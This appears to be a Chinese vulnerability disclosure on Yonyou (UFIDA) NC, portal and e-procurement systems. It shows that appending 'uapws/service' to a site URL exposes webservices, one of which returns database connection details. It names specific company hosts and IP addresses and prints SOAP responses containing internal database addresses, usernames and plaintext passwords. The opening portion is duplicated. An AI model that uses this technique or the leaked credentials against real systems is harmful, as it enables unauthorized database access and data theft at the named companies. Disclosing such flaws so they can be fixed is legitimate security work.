### 简要描述: * ### 详细说明: [<img src="https://images.seebug.org/upload/201505/08123720ffd7f9bd42285cc7d66a2160b2279eae.png" alt="aaa.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/08123720ffd7f9bd42285cc7d66a2160b2279eae.png) 通过webservice接口泄露,涉及多个系统 一、NC系统 http://123.232.105.202/ http://erp.suning.com.cn/ http://115.238.57.245/ 以苏宁为例。 接口地址:http://erp.suning.com.cn/uapws/service 会发现很多接口,以数据库内网链接泄露为例(太多接口了,不一一测试了) 得到数据库内网链接为:http://erp.suning.com.cn/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl 利用接口测试工具调用接口得到数据库链接为: ``` <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Header> <ns0:Urc xmlns:ns0="http://ws.uap.nc/lang"> <datasource>design</datasource> <corpCode>simpchn</corpCode> <userCode>#UAP#</userCode> <langCode>simpchn</langCode> </ns0:Urc> </soap:Header> <soap:Body> <ns1:getDataSourceConfigResponse xmlns:ns1="http://inittool.ses.itf.nc/PortalSESInitToolService"> <return>nc57</return>...
### 简要描述: * ### 详细说明: [<img src="https://images.seebug.org/upload/201505/08123720ffd7f9bd42285cc7d66a2160b2279eae.png" alt="aaa.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/08123720ffd7f9bd42285cc7d66a2160b2279eae.png) 通过webservice接口泄露,涉及多个系统 一、NC系统 http://123.232.105.202/ http://erp.suning.com.cn/ http://115.238.57.245/ 以苏宁为例。 接口地址:http://erp.suning.com.cn/uapws/service 会发现很多接口,以数据库内网链接泄露为例(太多接口了,不一一测试了) 得到数据库内网链接为:http://erp.suning.com.cn/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl 利用接口测试工具调用接口得到数据库链接为: ``` <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Header> <ns0:Urc xmlns:ns0="http://ws.uap.nc/lang"> <datasource>design</datasource> <corpCode>simpchn</corpCode> <userCode>#UAP#</userCode> <langCode>simpchn</langCode> </ns0:Urc> </soap:Header> <soap:Body> <ns1:getDataSourceConfigResponse xmlns:ns1="http://inittool.ses.itf.nc/PortalSESInitToolService"> <return>nc57</return> <return>jdbc:oracle:thin:@10.0.0.30:1521:orcl</return> <return>nc35</return> <return>is0h1idu</return> </ns1:getDataSourceConfigResponse> </soap:Body> </soap:Envelope> ``` 全部明文,数据库账号密码以及库名均是明文 二、门户系统 http://hr.sbtjt.com/portal/app/mockapp/login.jsp?lrid=1 http://gpms.foton.com.cn/portal/app/mockapp/login.jsp?lrid=1 http://fm2.cscec.com/portal/app/mockapp/login.jsp?lrid=767685128 以福田汽车为例 全部接口地址:http://gpms.foton.com.cn/uapws/service 数据库接口地址:http://gpms.foton.com.cn/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl ``` <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Header> <ns0:Urc xmlns:ns0="http://ws.uap.nc/lang"> <ns0:datasource>design</ns0:datasource> <ns0:userCode>1001FF1000000000J580</ns0:userCode> <ns0:langCode>simpchn</ns0:langCode> </ns0:Urc> </soap:Header> <soap:Body> <ns1:getDataSourceConfigResponse xmlns:ns1="http://inittool.ses.itf.nc/PortalSESInitToolService"> <return>foton</return> <return>jdbc:oracle:thin:@172.24.6.101:1521:gpms</return> <return>hwpj63</return> <return>asdzxc</return> </ns1:getDataSourceConfigResponse> </soap:Body> </soap:Envelope> ``` 得到的数据库链接地址和账号密码,依旧明文 三、另一版本NC系统 http://bap.ufida.com/ http://www.bewg.net.cn/ 以用友官网系统为例 全部接口链接:http://bap.ufida.com/uapws/service 数据库接口链接:http://bap.ufida.com/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl ``` <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Header> <ns0:Urc xmlns:ns0="http://ws.uap.nc/lang"> <ns0:datasource>design</ns0:datasource> <ns0:userCode>#UAP#</ns0:userCode> <ns0:langCode>simpchn</ns0:langCode> </ns0:Urc> </soap:Header> <soap:Body> <ns1:getDataSourceConfigResponse xmlns:ns1="http://inittool.ses.itf.nc/PortalSESInitToolService"> <return>design</return> <return>jdbc:oracle:thin:@127.0.0.1:1521:orcl</return> <return>ba_demo_design20131231</return> <return>1</return> </ns1:getDataSourceConfigResponse> </soap:Body> </soap:Envelope> ``` 四、电子商务采购平台 http://61.178.99.236:9002/ebvp/ http://www.xinfagroup.com.cn:8080/ebvp/ http://zc.hayao.com:8080/ebvp/ http://221.1.83.115:9001/ebvp 以信发公司为例 全部接口地址:http://www.xinfagroup.com.cn:8080/uapws/service/ 数据库接口地址:http://www.xinfagroup.com.cn:8080/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl 数据库链接: ``` <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Header> <ns0:Urc xmlns:ns0="http://ws.uap.nc/lang"> <ns0:datasource>design</ns0:datasource> <ns0:userCode>#UAP#</ns0:userCode> <ns0:langCode>simpchn</ns0:langCode> </ns0:Urc> </soap:Header> <soap:Body> <ns1:getDataSourceConfigResponse xmlns:ns1="http://inittool.ses.itf.nc/PortalSESInitToolService"> <return>nc</return> <return>jdbc:oracle:thin:@(DESCRIPTION=(ADDRESS = (PROTOCOL = TCP)(HOST = 10.10.1.34)(PORT = 1521))(ADDRESS = (PROTOCOL = TCP)(HOST =10.10.1.33)(PORT = 1521))(LOAD_BALANCE = yes)(CONNECT_DATA = (SERVER = DEDICATED)(SERVICE_NAME = orcl_rac)))</return> <return>nc</return> <return>xinfajituan</return> </ns1:getDataSourceConfigResponse> </soap:Body> </soap:Envelope> ``` 依旧全部明文 设计用友多个系统,只要在网站后面加uapws/service即可查看该系统的所有接口,我只是测试了数据库接口的信息,而且数据库基本都是明文显示,危害还是很大的。 ### 漏洞证明:
